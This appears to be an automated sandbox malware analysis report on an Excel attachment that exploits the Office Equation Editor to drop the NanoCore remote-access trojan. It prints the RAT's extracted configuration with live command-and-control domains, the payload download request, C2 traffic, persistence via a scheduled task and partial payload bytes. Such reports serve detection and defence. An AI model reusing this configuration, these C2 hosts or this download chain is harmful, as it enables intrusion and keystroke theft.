Loading ...

Play interactive tourEdit tour

Windows Analysis Report F99 SEP-15 Price Inquiry.xlsx

Overview

General Information

Sample Name:F99 SEP-15 Price Inquiry.xlsx
Analysis ID:483694
MD5:4128d571ef358c0a3f7f8395f1d0fbfb
SHA1:47754be43c4494c02c0bf981dd29c1a1e493bcc7
SHA256:a87afbfab3f21c608c233f86f127b31d318132f122f6d08f3065d255dbd1e2fd
Tags:NanoCoreVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Yara detected Nanocore RAT
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1332 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2704 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2364 cmdline: 'C:\Users\Public\vbc.exe' MD5: AD2C14959341C7EC7D72C9FB3B10DEB9)
      • schtasks.exe (PID: 2656 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\smsBuojZSZn' /XML 'C:\Users\user\AppData\Local\Temp\tmpC2C3.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • RegSvcs.exe (PID: 2624 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "42fc7104-2795-42db-8417-dc7142ab", "Group": "NEW ME", "Domain1": "newmeforever.3utilities.com", "Domain2": "newmeforever12.3utilities.com", "Port": 83, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x13a8:$x1: NanoCore.ClientPluginHost
00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x13a8:$x2: NanoCore.ClientPluginHost
  • 0x1486:$s4: PipeCreated
  • 0x13c2:$s5: IClientLoggingHost
00000009.00000002.692419310.0000000004780000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1f1db:$x1: NanoCore.ClientPluginHost
  • 0x1f1f5:$x2: IClientNetworkHost
00000009.00000002.692419310.0000000004780000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x1f1db:$x2: NanoCore.ClientPluginHost
  • 0x22518:$s4: PipeCreated
  • 0x1f1c8:$s5: IClientLoggingHost
00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Click to see the 42 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
9.2.RegSvcs.exe.d30000.6.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x13a8:$x1: NanoCore.ClientPluginHost
9.2.RegSvcs.exe.d30000.6.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x13a8:$x2: NanoCore.ClientPluginHost
  • 0x1486:$s4: PipeCreated
  • 0x13c2:$s5: IClientLoggingHost
9.2.RegSvcs.exe.dd0000.10.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x170b:$x1: NanoCore.ClientPluginHost
  • 0x1725:$x2: IClientNetworkHost
9.2.RegSvcs.exe.dd0000.10.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x170b:$x2: NanoCore.ClientPluginHost
  • 0x34b6:$s4: PipeCreated
  • 0x16f8:$s5: IClientLoggingHost
9.2.RegSvcs.exe.d40000.7.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x3deb:$x1: NanoCore.ClientPluginHost
  • 0x3f48:$x2: IClientNetworkHost
Click to see the 88 entries

Sigma Overview

AV Detection:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2624, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Exploits:

barindex
Sigma detected: EQNEDT32.EXE connecting to internetShow sources
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 207.246.99.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2704, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXEShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2704, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe

E-Banking Fraud:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2624, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

System Summary:

barindex
Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2704, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2364
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2364, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2624
Sigma detected: Execution from Suspicious FolderShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2704, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2364
Sigma detected: Possible Applocker BypassShow sources
Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2364, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2624

Stealing of Sensitive Information:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2624, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Remote Access Functionality:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2624, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Found malware configurationShow sources
Source: 00000009.00000002.692216842.0000000003971000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "42fc7104-2795-42db-8417-dc7142ab", "Group": "NEW ME", "Domain1": "newmeforever.3utilities.com", "Domain2": "newmeforever12.3utilities.com", "Port": 83, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Multi AV Scanner detection for submitted fileShow sources
Source: F99 SEP-15 Price Inquiry.xlsxReversingLabs: Detection: 28%
Antivirus detection for URL or domainShow sources
Source: newmeforever.3utilities.comAvira URL Cloud: Label: phishing
Source: newmeforever12.3utilities.comAvira URL Cloud: Label: phishing
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.692216842.0000000003971000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR
Source: 9.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
Source: 9.2.RegSvcs.exe.e30000.11.unpackAvira: Label: TR/NanoCore.fadte

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ystem.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: bvcs.pdbg source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbPP source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: qC:\Windows\System.pdb source: RegSvcs.exe, 00000009.00000002.693310100.000000000550B000.00000004.00000001.sdmp
Source: Binary string: newmeforever12.3utilities.comsymbols\dll\System.pdbP source: RegSvcs.exe, 00000009.00000002.693310100.000000000550B000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000009.00000002.692562534.00000000048ED000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000009.00000002.692562534.00000000048ED000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp
Source: Binary string: System.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: System.pdbX source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: global trafficDNS query: name: newmeforever.3utilities.com
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 4x nop then mov esp, ebp
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 207.246.99.155:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 207.246.99.155:80
Source: excel.exeMemory has grown: Private usage: 4MB later: 69MB

Networking:

barindex
C2 URLs / IPs found in malware configurationShow sources
Source: Malware configuration extractorURLs: newmeforever.3utilities.com
Source: Malware configuration extractorURLs: newmeforever12.3utilities.com
Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
Source: Joe Sandbox ViewIP Address: 79.134.225.19 79.134.225.19
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:45:21 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23Last-Modified: Wed, 15 Sep 2021 08:16:45 GMTETag: "ff200-5cc0451ab57c1"Accept-Ranges: bytesContent-Length: 1044992Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed ab 41 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 82 0f 00 00 6e 00 00 00 00 00 00 8a a0 0f 00 00 20 00 00 00 c0 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 a0 0f 00 57 00 00 00 00 e0 0f 00 3c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 80 0f 00 00 20 00 00 00 82 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0f 00 00 02 00 00 00 84 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 3c 6b 00 00 00 e0 0f 00 00 6c 00 00 00 86 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c a0 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 49 0f 00 88 56 00 00 03 00 00 00 48 02 00 06 8c b6 00 00 1c 93 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 02 28 17 00 00 0a 6f 18 00 00 0a 7d 03 00 00 04 2a 00 06 2a 00 00 13 30 03 00 03 01 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 45 08 00 00 00 02 00 00 00 1d 00 00 00 38 00 00 00 5a 00 00 00 75 00 00 00 97 00 00 00 b2 00 00 00 cd 00 00 00 16 2a 02 15 7d 01 00 00 04 02 20 5d f9 34 53 7d 02 00 00 04 02 17 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 a6 bd 51 f9 7d 02 00 00 04 02 18 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 02 7b 04 00 00 04 20 4b 6d da 95 61 7d 02 00 00 04 02 19 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 2c bc c2 c2 7d 02 00 00 04 02 1a 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 02 7b 04 00 00 04 20 14 10 3d 87 61 7d 02 00 00 04 02 1b 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 94 13 e8 f4 7d 02 00 00 04 02 1c 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 22 47 f5 52 7d 02 00 00 04 02 1d 7d 01 00 00
Source: global trafficHTTP traffic detected: GET /covid/nano.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 207.246.99.155Connection: Keep-Alive
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 79.134.225.19:83
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknownTCP traffic detected without corresponding DNS query: 207.246.99.155
Source: RegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmpString found in binary or memory: http://google.com
Source: vbc.exe, 00000006.00000002.490720765.0000000006050000.00000002.00020000.sdmp, RegSvcs.exe, 00000009.00000002.692717936.0000000004DE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000006.00000002.490720765.0000000006050000.00000002.00020000.sdmp, RegSvcs.exe, 00000009.00000002.692717936.0000000004DE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: CCB31E7E.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBB16E31.emfJump to behavior
Source: unknownDNS traffic detected: queries for: newmeforever.3utilities.com
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003F2B9E WSARecv,
Source: global trafficHTTP traffic detected: GET /covid/nano.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 207.246.99.155Connection: Keep-Alive
Source: RegSvcs.exe, 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmpBinary or memory string: RegisterRawInputDevices

E-Banking Fraud:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE
